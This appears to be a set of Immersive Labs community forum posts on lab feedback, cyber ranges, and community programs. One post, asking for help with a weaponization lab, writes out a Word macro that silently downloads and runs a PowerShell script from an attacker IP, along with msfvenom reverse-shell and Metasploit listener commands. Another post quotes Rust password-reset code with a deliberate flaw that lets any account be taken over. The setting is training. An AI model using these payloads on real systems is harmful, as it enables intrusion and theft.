Take part in Immersive research: AI Chatbot in labs
📢 We would love to hear your opinions on a new AI Chatbot concept within our labs. Can you spare an hour to come along to a research call? During the call, you will be asked to undertake a lab on our test environment, using the AI chatbot to assist. We will then ask for feedback on your experience. You will need to attend the call on a laptop or desktop (no tablets or phones) and be able to share your screen throughout. The session will be recorded and will take place using Google Meet. Upon completion of the session, you will receive a £50 eGift card (or local currency equivalent). Sessions are taking place August 12-14th. 🗓️ Sign up at a time that is convenient for you, using this booking form..
Immersive Labs Advocacy Program
Hey Immersive Labs Team, i am not too sure how do i reach out regarding the program hence is posting here. I previously received an email asking me if i wish to join the IL Advocacy program of which I have filled in the form indicating my interest. However one of your staff TillyCorless​ contacted me to remind me to indicate my interest if I haven't already. Quite sure I did, but nonetheless I filled in the form again. But since then, I have not received any follow up emails regarding it. Was wondering whether there's a bug with the form and whether my submission did went through? :) Thank you and please let me know!How to use Immersive cyber ranges for cyber threat research?
Want to know how to take advantage of the cyber ranges platform to do malware and adversary research in a sandboxed environment? In this post, I’ll walk you through how to get access to the Heimdall Detection Engineering template for CTI so you can do just that! The Heimdall template is a domain-joined range that contains workstations, a domain controller, and security tooling that you’d ordinarily find in a real network. The purpose of this template is to enable cyber threat research, where you can launch attacks and malware, capture indicators of compromise through tools like Velociraptor, a SIEM network packet capture tool, and some analyst workstations with a bunch of analysis and reverse engineering tools. With that said, let’s get started. Firstly, you’ll need to go to the cyber ranges sign-up page and sign up with a name and email address. After hitting “Sign up”, you’ll need to go to your email and find the confirmation email to get your credentials, then go back to the cyber ranges website and log in with your new credentials. After signing in, you’ll be in the main ranges dashboard. You’ll need to connect your own Amazon Web Services (AWS) account to use ranges, as provisioning machines will cost money for every hour that they are active or stored. Once you’ve connected your AWS account, you can then go to “Range Templates” and launch the Heimdall range.Why I don't like: Find the Flaw
After done almost all "Find the Flaw" labs I'm trying to give a feedback about this mode. On one hand it's quite handy and nice, to see and define flaws and link them to the corresponding CWE. But sometimes it takes time... very long time (for 20 pts!). Here's an example, I want to share which I'm struggling with and which does not makes sense for me - and there are many FtF labs like this which are forcing me to do try and error. Let's take "Find the Flaw: Rust – Identification and Authentication Failures". You'll have a code like (for brevity I've shortend it a little bit): ... #[derive(Deserialize)] struct PasswordForm { token: String, password: String, } #[derive(Deserialize)] struct UserIdQuery { user_id: String, } async fn reset_password( Query(user_id_query): Query<UserIdQuery>, pool: axum::extract::Extension<SqlitePool>, Form(form): Form<PasswordForm>, ) -> Html<String> { let user_id = user_id_query.user_id; let token = form.token; let password = form.password; if password.len() < 8 || !password.chars().any(|c| c.is_lowercase()) { return Html("Password must be at least 8 characters long and contain at least one lowercase letter.".to_string()); } let hashed_password = sha256(password.as_bytes()); let hashed_password_hex = hex::encode(hashed_password); let pool = pool.0; let result = query("SELECT user_id FROM password_resets WHERE token = ?").bind(token) .fetch_optional(&pool) .await; match result { Ok(Some(_)) => { let update_result = query( "UPDATE users SET password = ? WHERE id = ?") .bind(hashed_password_hex) .bind(user_id) .execute(&pool) .await; ... } pub async fn main() -> Result<(), std::io::Error> { ... .route("/reset_password", post(reset_password)) ... so, on the first glimpse you'll notice: let result = query("SELECT user_id FROM password_resets WHERE token = ?").bind(token) .fetch_optional(&pool) .await; and you think: cool, as long as I have a valid token I can reset ANY password, because the UserIdQuery holds the user_id from the query parameters. That must be the error. And it's clearly CWE-640 - Weak Password Recovery Mechanism for Forgotten Password. Boom! But lab says: "Correct Vulnerability but Incorrect Line" Then you say, ok.. something might be missing... or too much. you'll remove lines, 3... 2.. 1.. nothing. maybe I need to add the update password procedure? so let's click the lines on: let result = query("SELECT user_id FROM password_resets WHERE token = ?") .bind(token) .fetch_optional(&pool) .await; and... ? "Correct Vulnerability but Incorrect Line" now you start clicking on 1 up to 7 lines in all different combinations (no .await, but .bind) but: "Correct Vulnerability but Incorrect Line" You add another part of the code, which could make sense like: let user_id = user_id_query.user_id; let token = form.token; let password = form.password; Again here you start shuffling all the options (now you click between 1 up to 10 lines in all different variations) but all you get is this "Correct Vulnerability but Incorrect Line". You read again the hint you've got with the wrong answer: "Consider how the password is being reset". Yes I did, really! All the time! and so on and so on... probably I've clicked now hundreds of different combinations and so on and I start believing there's a bug in the lab (would not be the first one on this collection). So, how is it for you those "Find the flaw" labs? You like them? You struggle with them? greetings -steven ps: If you have the solution or any other hint for this one, ping me :)
Weaponization: Payloads – Office Macros
I've been banging my head against this brick wall for a few hours now and I could use a second set of eyes. 1. I've created a macro enabled word doc with the following vb code on windows machine: Sub Document_Open() Dim ps as String ps = "powershell.exe -NoExit Invoke-Expression (New-Object Net.WebClient).DownloadString('http://MY_KALI_IP/shell.ps1')" process = Shell(ps, vbhide) End Sub 2. python3 -m http.server to start server to serve shell.ps1 on request 3. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f psh > shell.ps1 to create reverse shell with same name the command in the macro script will go looking for 4. create listener with sudo msfconsole, use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST KALI IP, set LPORT 443 then exploit to start listener 5. back on windows machine, go to target_ip:8888, browse to macro doc, submit and execute. What am I missing?Cyber Resilience Advisors
Welcome to your community. Here, you can converse and ask questions to expand your knowledge of cyber and get the most out of the platform. The title of this post is "Cyber Resilience Advisors." So, what are they, and how do they help? A Cyber Resilience Advisor is a professional who guides organizations in developing and managing their cybersecurity workforce. They may assist with strategy development, talent acquisition, career development, performance management, and training for cybersecurity roles. Their ultimate goal is to ensure the organization has a highly skilled, competent, and effective cybersecurity team to protect against and respond to cyber threats. So, what am I telling you this? Immersive Labs has a multitude of SMEs across a broad spectrum of skills and professions with whom you can interact and ask questions as part of the community. I am a Cyber Resilience Advisor and part of the Cyber Resilience Team. We are on here as well. It is a cliche, but in cyber, we really are in this together; we gain security through knowledge, and here is the perfect vehicle to gain that in conjunction with the platform. I look forward to joining you all in the community and helping make your cybersecurity visions a reality, regardless of your skill sets and experience. As a community, we can accomplish anything. Clem Craven
